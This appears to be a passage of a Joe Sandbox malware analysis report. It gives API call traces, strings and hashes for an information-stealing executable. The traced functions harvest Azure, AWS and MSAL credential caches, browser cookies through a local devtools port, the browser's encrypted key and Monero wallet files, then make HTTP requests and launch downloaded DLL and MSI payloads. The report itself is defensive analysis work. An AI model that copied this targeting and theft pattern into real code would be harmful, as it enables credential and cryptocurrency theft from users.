                                      • Part of subcall function 00C98F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00C98F9B
                                    • lstrcat.KERNEL32(?,00000000), ref: 00C95000
                                    • lstrcat.KERNEL32(?,\.azure\), ref: 00C9501D
                                      • Part of subcall function 00C94B60: wsprintfA.USER32 ref: 00C94B7C
                                      • Part of subcall function 00C94B60: FindFirstFileA.KERNEL32(?,?), ref: 00C94B93
                                    • lstrcat.KERNEL32(?,00000000), ref: 00C9508C
                                    • lstrcat.KERNEL32(?,\.aws\), ref: 00C950A9
                                      • Part of subcall function 00C94B60: StrCmpCA.SHLWAPI(?,00CA0FC4), ref: 00C94BC1
                                      • Part of subcall function 00C94B60: StrCmpCA.SHLWAPI(?,00CA0FC8), ref: 00C94BD7
                                      • Part of subcall function 00C94B60: FindNextFileA.KERNEL32(000000FF,?), ref: 00C94DCD
                                      • Part of subcall function 00C94B60: FindClose.KERNEL32(000000FF), ref: 00C94DE2
                                    • lstrcat.KERNEL32(?,00000000), ref: 00C95118
                                    • lstrcat.KERNEL32(?,\.IdentityService\), ref: 00C95135
                                      • Part of subcall function 00C94B60: wsprintfA.USER32 ref: 00C94C00
                                      • Part of subcall function 00C94B60: StrCmpCA.SHLWAPI(?,00CA08D3), ref: 00C94C15
                                      • Part of subcall function 00C94B60: wsprintfA.USER32 ref: 00C94C32
                                      • Part of subcall function 00C94B60: PathMatchSpecA.SHLWAPI(?,?), ref: 00C94C6E
                                      • Part of subcall function 00C94B60: lstrcat.KERNEL32(?,0152E3A0), ref: 00C94C9A
                                      • Part of subcall function 00C94B60: lstrcat.KERNEL32(?,00CA0FE0), ref: 00C94CAC
                                      • Part of subcall function 00C94B60: lstrcat.KERNEL32(?,?), ref: 00C94CC0
                                      • Part of subcall function 00C94B60: lstrcat.KERNEL32(?,00CA0FE4), ref: 00C94CD2
                                      • Part of subcall function 00C94B60: lstrcat.KERNEL32(?,?), ref: 00C94CE6
                                      • Part of subcall function 00C94B60: CopyFileA.KERNEL32(?,?,00000001), ref: 00C94CFC
                                      • Part of subcall function 00C94B60: DeleteFileA.KERNEL32(?), ref: 00C94D81
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2102193900.0000000000C81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2102046137.0000000000C80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000F56000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.0000000000F6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000010F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.000000000120C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103557076.000000000120D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103687575.00000000013A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103705828.00000000013AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                    • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                                    • API String ID: 949356159-974132213
                                    • Opcode ID: 871ca0614815765e4a30aa92922e5bcd2150ebd951411c4bfff59fd7fc1c159d
                                    • Instruction ID: 5aaa559713385faaed783d9a9ed7e5fc57c106e042fbd2ea00d860d6f462fcfb
                                    • Opcode Fuzzy Hash: 871ca0614815765e4a30aa92922e5bcd2150ebd951411c4bfff59fd7fc1c159d
                                    • Instruction Fuzzy Hash: 1641C4BA94430867DF14F7B0EC9BFED33385B65705F004564B649660C1EEB46BC89B92
                                    Function 00C991A0 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 184COMMON
                                    Download Yara Rule
                                    APIs
                                    • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00C991FC
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2102193900.0000000000C81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2102046137.0000000000C80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000F56000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.0000000000F6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000010F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.000000000120C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103557076.000000000120D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103687575.00000000013A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103705828.00000000013AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CreateGlobalStream
                                    • String ID: image/jpeg
                                    • API String ID: 2244384528-3785015651
                                    • Opcode ID: 53f8cf3574831659e12750ab9d08128f0aed6ffaccad1ab3fdb8362ea94da176
                                    • Instruction ID: 65863991cf0bbc33e15dfb3c08d94643d71f1b882077de234ec5ec32afa85cfe
                                    • Opcode Fuzzy Hash: 53f8cf3574831659e12750ab9d08128f0aed6ffaccad1ab3fdb8362ea94da176
                                    • Instruction Fuzzy Hash: F371BE75914308ABDB14EFE4EC89FEEB7B8FB48701F108508F616A7290DB74A905DB60
                                    Function 00C93080 Relevance: 19.7, APIs: 3, Strings: 8, Instructions: 469COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00C9AA50: lstrcpy.KERNEL32(00CA0E1A,00000000), ref: 00C9AA98
                                    • ShellExecuteEx.SHELL32(0000003C), ref: 00C93415
                                    • ShellExecuteEx.SHELL32(0000003C), ref: 00C935AD
                                    • ShellExecuteEx.SHELL32(0000003C), ref: 00C9373A
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2102193900.0000000000C81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2102046137.0000000000C80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000F56000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.0000000000F6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000010F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.000000000120C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103557076.000000000120D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103687575.00000000013A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103705828.00000000013AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ExecuteShell$lstrcpy
                                    • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                                    • API String ID: 2507796910-3625054190
                                    • Opcode ID: 9c1c3c4fc9949feea500c61e74afaac75744d95a7ce24b80aa8b73cf5eaf6318
                                    • Instruction ID: a7c40140d95cc5303341114833b6963fdfd4b244c07a192822d22b337519900a
                                    • Opcode Fuzzy Hash: 9c1c3c4fc9949feea500c61e74afaac75744d95a7ce24b80aa8b73cf5eaf6318
                                    • Instruction Fuzzy Hash: 65120D72910108ABCF18FBA0DDAAFEDB739AF14300F504599F10666192EF346B49DFA5
                                    Function 00C89BE0 Relevance: 19.6, APIs: 8, Strings: 5, Instructions: 146stringCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00C89A50: InternetOpenA.WININET(00CA0AF6,00000001,00000000,00000000,00000000), ref: 00C89A6A
                                    • lstrcat.KERNEL32(?,cookies), ref: 00C89CAF
                                    • lstrcat.KERNEL32(?,00CA12C4), ref: 00C89CC1
                                    • lstrcat.KERNEL32(?,?), ref: 00C89CD5
                                    • lstrcat.KERNEL32(?,00CA12C8), ref: 00C89CE7
                                    • lstrcat.KERNEL32(?,?), ref: 00C89CFB
                                    • lstrcat.KERNEL32(?,.txt), ref: 00C89D0D
                                    • lstrlen.KERNEL32(00000000), ref: 00C89D17
                                    • lstrlen.KERNEL32(00000000), ref: 00C89D26
                                      • Part of subcall function 00C9AA50: lstrcpy.KERNEL32(00CA0E1A,00000000), ref: 00C9AA98
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2102193900.0000000000C81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2102046137.0000000000C80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000F56000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.0000000000F6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000010F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.000000000120C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103557076.000000000120D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103687575.00000000013A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103705828.00000000013AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$lstrlen$InternetOpenlstrcpy
                                    • String ID: .txt$/devtools$cookies$localhost$ws://localhost:9229
                                    • API String ID: 3174675846-3542011879
                                    • Opcode ID: be2e1873fd08a1367dbad5f8085d3b7e8eed4685a3921492f596fb312e5f870b
                                    • Instruction ID: 4daa492a860acb858582de3f4d6f30fc9025a811a66d8088f067a0146445759a
                                    • Opcode Fuzzy Hash: be2e1873fd08a1367dbad5f8085d3b7e8eed4685a3921492f596fb312e5f870b
                                    • Instruction Fuzzy Hash: 18518371910608ABCB14FBE0EC99FEE7778AF44305F444658F60AA7091EF30AA49DF65
                                    Function 00C95510 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 139stringCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00C9AAB0: lstrcpy.KERNEL32(?,00000000), ref: 00C9AAF6
                                      • Part of subcall function 00C862D0: InternetOpenA.WININET(00CA0DFF,00000001,00000000,00000000,00000000), ref: 00C86331
                                      • Part of subcall function 00C862D0: StrCmpCA.SHLWAPI(?,0152E3C0), ref: 00C86353
                                      • Part of subcall function 00C862D0: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00C86385
                                      • Part of subcall function 00C862D0: HttpOpenRequestA.WININET(00000000,GET,?,0152DA28,00000000,00000000,00400100,00000000), ref: 00C863D5
                                      • Part of subcall function 00C862D0: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00C8640F
                                      • Part of subcall function 00C862D0: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00C86421
                                      • Part of subcall function 00C9ABB0: lstrcpy.KERNEL32(?,00CA0E1A), ref: 00C9AC15
                                    • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00C95568
                                    • lstrlen.KERNEL32(00000000), ref: 00C9557F
                                      • Part of subcall function 00C98FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00C98FE2
                                    • StrStrA.SHLWAPI(00000000,00000000), ref: 00C955B4
                                    • lstrlen.KERNEL32(00000000), ref: 00C955D3
                                    • lstrlen.KERNEL32(00000000), ref: 00C955FE
                                      • Part of subcall function 00C9AA50: lstrcpy.KERNEL32(00CA0E1A,00000000), ref: 00C9AA98
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2102193900.0000000000C81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2102046137.0000000000C80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000F56000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.0000000000F6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000010F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.000000000120C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103557076.000000000120D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103687575.00000000013A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103705828.00000000013AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
                                    • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                                    • API String ID: 3240024479-1526165396
                                    • Opcode ID: 41a6021b97877690f70074b2f9f1be9aaaa655e6d94801cad02b1b5b39fc0809
                                    • Instruction ID: 50fa6d682904a84a9bc2d62d82a54492c2f10457174d2a320ac3226db494dd00
                                    • Opcode Fuzzy Hash: 41a6021b97877690f70074b2f9f1be9aaaa655e6d94801cad02b1b5b39fc0809
                                    • Instruction Fuzzy Hash: D3511D30914108EBCF14FFA0DDAAAED7779AF10341F504468F90A57592EF30AB45EBA6
                                    Function 00C91520 Relevance: 16.8, APIs: 11, Instructions: 310COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2102193900.0000000000C81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2102046137.0000000000C80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000F56000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.0000000000F6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000010F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.000000000120C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103557076.000000000120D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103687575.00000000013A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103705828.00000000013AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpylstrlen
                                    • String ID:
                                    • API String ID: 2001356338-0
                                    • Opcode ID: a1d5f6a54e57ec42b28ae16ca1ea783fa3c28c679c05cb56438e3a6de59caed9
                                    • Instruction ID: fc4a734ab1d74831cfa42299b2b6059c8c3d0c8aded39e619a7b6d1e5e87f215
                                    • Opcode Fuzzy Hash: a1d5f6a54e57ec42b28ae16ca1ea783fa3c28c679c05cb56438e3a6de59caed9
                                    • Instruction Fuzzy Hash: 9FC1B2B6900219ABCF14EF60DC9EFEE77B8BF54304F044598F509A7251EA70AA84DF90
                                    Function 00C944D0 Relevance: 16.7, APIs: 11, Instructions: 204stringCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00C98F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00C98F9B
                                    • lstrcat.KERNEL32(?,00000000), ref: 00C9453C
                                    • lstrcat.KERNEL32(?,0152DE78), ref: 00C9455B
                                    • lstrcat.KERNEL32(?,?), ref: 00C9456F
                                    • lstrcat.KERNEL32(?,0152CE50), ref: 00C94583
                                      • Part of subcall function 00C9AA50: lstrcpy.KERNEL32(00CA0E1A,00000000), ref: 00C9AA98
                                      • Part of subcall function 00C98F20: GetFileAttributesA.KERNEL32(00000000,?,00C81B94,?,?,00CA577C,?,?,00CA0E22), ref: 00C98F2F
                                      • Part of subcall function 00C8A430: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00C8A489
                                      • Part of subcall function 00C8A110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00C8A13C
                                      • Part of subcall function 00C8A110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00C8A161
                                      • Part of subcall function 00C8A110: LocalAlloc.KERNEL32(00000040,?), ref: 00C8A181
                                      • Part of subcall function 00C8A110: ReadFile.KERNEL32(000000FF,?,00000000,00C8148F,00000000), ref: 00C8A1AA
                                      • Part of subcall function 00C8A110: LocalFree.KERNEL32(00C8148F), ref: 00C8A1E0
                                      • Part of subcall function 00C8A110: CloseHandle.KERNEL32(000000FF), ref: 00C8A1EA
                                      • Part of subcall function 00C99550: GlobalAlloc.KERNEL32(00000000,00C9462D,00C9462D), ref: 00C99563
                                    • StrStrA.SHLWAPI(?,0152DE90), ref: 00C94643
                                    • GlobalFree.KERNEL32(?), ref: 00C94762
                                      • Part of subcall function 00C8A210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00C84F3E,00000000,00000000), ref: 00C8A23F
                                      • Part of subcall function 00C8A210: LocalAlloc.KERNEL32(00000040,?,?,?,00C84F3E,00000000,?), ref: 00C8A251
                                      • Part of subcall function 00C8A210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00C84F3E,00000000,00000000), ref: 00C8A27A
                                      • Part of subcall function 00C8A210: LocalFree.KERNEL32(?,?,?,?,00C84F3E,00000000,?), ref: 00C8A28F
                                    • lstrcat.KERNEL32(?,00000000), ref: 00C946F3
                                    • StrCmpCA.SHLWAPI(?,00CA08D2), ref: 00C94710
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 00C94722
                                    • lstrcat.KERNEL32(00000000,?), ref: 00C94735
                                    • lstrcat.KERNEL32(00000000,00CA0FA0), ref: 00C94744
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2102193900.0000000000C81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2102046137.0000000000C80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000F56000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.0000000000F6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000010F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.000000000120C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103557076.000000000120D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103687575.00000000013A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103705828.00000000013AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                                    • String ID:
                                    • API String ID: 3541710228-0
                                    • Opcode ID: 9ea9887afacc713212333133ca32de4605e99eace0a05bca5284b18596b8b3d2
                                    • Instruction ID: aa0acf88b1445feefcbff8526fa4c9a7bf608acdeb3e6e8982d70968d948d715
                                    • Opcode Fuzzy Hash: 9ea9887afacc713212333133ca32de4605e99eace0a05bca5284b18596b8b3d2
                                    • Instruction Fuzzy Hash: CF7164B6900208ABDF14EBE0ED99FDE7379AB89304F044598F60597181EA34EB49DF91
                                    Function 00C81310 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 141stringfileCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00C812A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00C812B4
                                      • Part of subcall function 00C812A0: RtlAllocateHeap.NTDLL(00000000), ref: 00C812BB
                                      • Part of subcall function 00C812A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 00C812D7
                                      • Part of subcall function 00C812A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 00C812F5
                                      • Part of subcall function 00C812A0: RegCloseKey.ADVAPI32(?), ref: 00C812FF
                                    • lstrcat.KERNEL32(?,00000000), ref: 00C8134F
                                    • lstrlen.KERNEL32(?), ref: 00C8135C
                                    • lstrcat.KERNEL32(?,.keys), ref: 00C81377
                                      • Part of subcall function 00C9AA50: lstrcpy.KERNEL32(00CA0E1A,00000000), ref: 00C9AA98
                                      • Part of subcall function 00C9ACC0: lstrlen.KERNEL32(?,015289E0,?,\Monero\wallet.keys,00CA0E1A), ref: 00C9ACD5
                                      • Part of subcall function 00C9ACC0: lstrcpy.KERNEL32(00000000), ref: 00C9AD14
                                      • Part of subcall function 00C9ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00C9AD22
                                      • Part of subcall function 00C9ABB0: lstrcpy.KERNEL32(?,00CA0E1A), ref: 00C9AC15
                                      • Part of subcall function 00C98CF0: GetSystemTime.KERNEL32(00CA0E1B,0152A068,00CA05B6,?,?,00C813F9,?,0000001A,00CA0E1B,00000000,?,015289E0,?,\Monero\wallet.keys,00CA0E1A), ref: 00C98D16
                                      • Part of subcall function 00C9AC30: lstrcpy.KERNEL32(00000000,?), ref: 00C9AC82
                                      • Part of subcall function 00C9AC30: lstrcat.KERNEL32(00000000), ref: 00C9AC92
                                    • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00C81465
                                      • Part of subcall function 00C9AAB0: lstrcpy.KERNEL32(?,00000000), ref: 00C9AAF6
                                      • Part of subcall function 00C8A110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00C8A13C
                                      • Part of subcall function 00C8A110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00C8A161
                                      • Part of subcall function 00C8A110: LocalAlloc.KERNEL32(00000040,?), ref: 00C8A181
                                      • Part of subcall function 00C8A110: ReadFile.KERNEL32(000000FF,?,00000000,00C8148F,00000000), ref: 00C8A1AA
                                      • Part of subcall function 00C8A110: LocalFree.KERNEL32(00C8148F), ref: 00C8A1E0
                                      • Part of subcall function 00C8A110: CloseHandle.KERNEL32(000000FF), ref: 00C8A1EA
                                    • DeleteFileA.KERNEL32(00000000), ref: 00C814EF
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2102193900.0000000000C81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2102046137.0000000000C80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DBD000.00000040.00000001.01000000.00000003.sdmpDownload File
